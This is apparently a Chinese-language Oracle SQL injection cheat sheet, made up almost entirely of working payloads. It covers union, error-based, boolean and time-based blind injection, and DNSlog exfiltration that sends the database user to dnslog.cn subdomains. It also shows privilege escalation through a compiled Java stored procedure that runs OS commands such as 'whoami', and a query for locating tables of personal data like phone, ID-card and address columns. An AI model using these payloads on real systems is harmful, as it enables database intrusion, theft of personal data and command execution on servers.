手工注入

常规有回显注入

order by 3–
and 1=2 union select null,null,null from dual–
and 1=2 union select ‘null’,null,null from dual– //返回正常,则第一个字段是数字型,返回错误,为字符型
and 1=2 union select 1,’2’,’3’ from dual– //判断显示位
and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual– //探测数据库版本信息
and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual– //查询第一个表名
and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>’STUDENT’),null from dual– //第二个表名

获取关键表中的列名:
‘ union select null,(select column_name from user_tab_columns where table_name=’T_USER’ and rownum=1),null from dual –

‘ union select null,(select column_name from user_tab_columns where table_name=’T_USER’ and column_name<>’SUSER’ and rownum=1),null from dual –

‘ union select null,(select column_name from user_tab_columns where table_name=’T_USER’ and column_name<>’SUSER’ and column_name<>’SPWD’ and rownum=1),null from dual –

‘ union select null,(select column_name from user_tab_columns where table_name=’T_USER’ and column_name<>’SUSER’ and column_name<>’SPWD’ and column_name<>’SNAME’ and rownum=1),null from dual –

and 1=2 union select SNAME,SUSER,SPWD from T_USER where id=1– //查看数据

第二种常规注入
确定回显位,假设当前共 2 个字段,全是数字型,判断方式如下:
and 1=2 union select 1,2 from dual 假设回显位是 2,爆当前数据库中的第一个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1) from dual 爆当前数据库中的第二个表:
and 1=2 union select 1,(select table_name from user_tables where rownum=1 and table_name not in (‘第一个表’)) from dual 以此类推去爆第 n 个表
爆某表中的第一个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name=’表名(大写的)’) from dual 爆某表中的第二个字段:
and 1=2 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name=’表名’ and column_name not in (‘第一个字段’)) from dual 爆其它字段以此类推
爆某表中的第一行数据:
and 1=2 union select 1,字段 1|| 字段 2…|| 字段 n from 表名 where rownum=1 –连接多个字段用到的连接符号是 ||,在 oracle 数据库中,concat 函数只能连接两个字符串

报错注入

利用 utl_inaddr.get_host_name
这种方法在 Oracle 8g,9g,10g 中不需要任何权限,但是在 Oracle 11g 以及以后的版本中,当前数据库用户必须有网络访问权限。

jsp?name=’ and 1=utl_inaddr.get_host_name((select user from dual)) –

ctxsys.drithsx.sn()
jsp?name=’ and 1=ctxsys.drithsx.sn(1,(select user from dual)) –

dbms_xdb_version.checkin()
jsp?name=1’ and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null—

dbms_utility.sqlid_to_sqlhash()
jsp?name=1’ and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null –

XMLType()
sname=1′ and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null –

布尔注入

jsp?id=1 and 1=(select decode(substr(user,1,1),’S’,1,0) from dual) – # 判断第一个字母是否是S,等于返回1否则返回0

时间盲注

主要用 DBMS_PIPE.RECEIVE_MESSAGE
即 user 的第一位是”A”时,延时 5 秒执行。
And 1=(select decode(substr(user,1,1),’A’,DBMS_PIPE.RECEIVE_MESSAGE(‘a’,5) ,0) from dual)
第二位是 D 时,延时 5 秒
And 1=(select decode(substr(user,2,1),’D’,DBMS_PIPE.RECEIVE_MESSAGE(‘a’,5) ,0) from dual)

news.jsp?id=1 and 1=(select decode(substr(user,1,1),’S’,dbms_pipe.receive_message(‘RDS’,5),0) from dual) –

DNSlog 注入

utl_inaddr.get_host_address
select utl_inaddr.get_host_address((select user from dual)||’.cbb1ya.dnslog.cn’) from dual

SYS.DBMS_LDAP.INIT 这个函数在 10g/11g 中是 public 权限.
SELECT DBMS_LDAP.INIT((select user from dual)||’.24wypw.dnslog.cn’,80) FROM DUAL;

提权

创建java函数提权

  • dba权限
  1. 使用sqlplus连接
1
system/system@192.168.117.66:1521/orcl
  1. 赋权
1
2
begin dbms_java.grant_permission( 'PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete' );end;
/
  1. 创建java代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
create or replace and compile java source named exe_linux as
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.UnknownHostException;
public class Test
{
public static String list_cmd(String str){
    Runtime runtime=Runtime.getRuntime();
  StringBuffer enco = new StringBuffer();
  enco.append("GBK");
  try{
  Process proc =runtime.exec(str);
  InputStream inp_suc=proc.getInputStream();
  InputStream inp_err=proc.getErrorStream();
  BufferedReader bfr_err = new BufferedReader(new InputStreamReader(inp_err,enco.toString()));
  BufferedReader bfr_suc = new BufferedReader(new InputStreamReader(inp_suc,enco.toString()));
    String strLine;
      while( (strLine=(bfr_suc.readLine())) != null){
     
      System.out.println(strLine);
          }
  while( (strLine=(bfr_err.readLine())) != null){
     
    System.out.println(strLine);
    }
        proc.destroy();
        inp_suc.close();
        inp_err.close();
    }catch (Exception e) {
      System.out.println("EXECUTE IS ERROR!");
      System.out.println(e.getMessage());
    }
    return "";
  }
     
  /* public static void main(String[] args){
     
      list_cmd(args[0]);
    }
    **/
}

/
  1. 创建存储过程
1
2
3
create or replace procedure p_exe_linux(str varchar2) as language java
name 'Test.list_cmd(java.lang.String)';
/
  1. 命令执行
1
2
3
SET SERVEROUTPUT ON
exec dbms_java.set_output(1111111111111);
EXEC P_EXE_LINUX('whoami');

Other

用户库中所有字段名带个人信息的表

1
SELECT * FROM USER_TAB_COLUMNS WHERE regexp_like(column_name,'NAME|PHONE|MOBILE|CERTIFICATE|NUMBER|EMAIL|ADDR|CARD|电话|地址|身份证|姓名')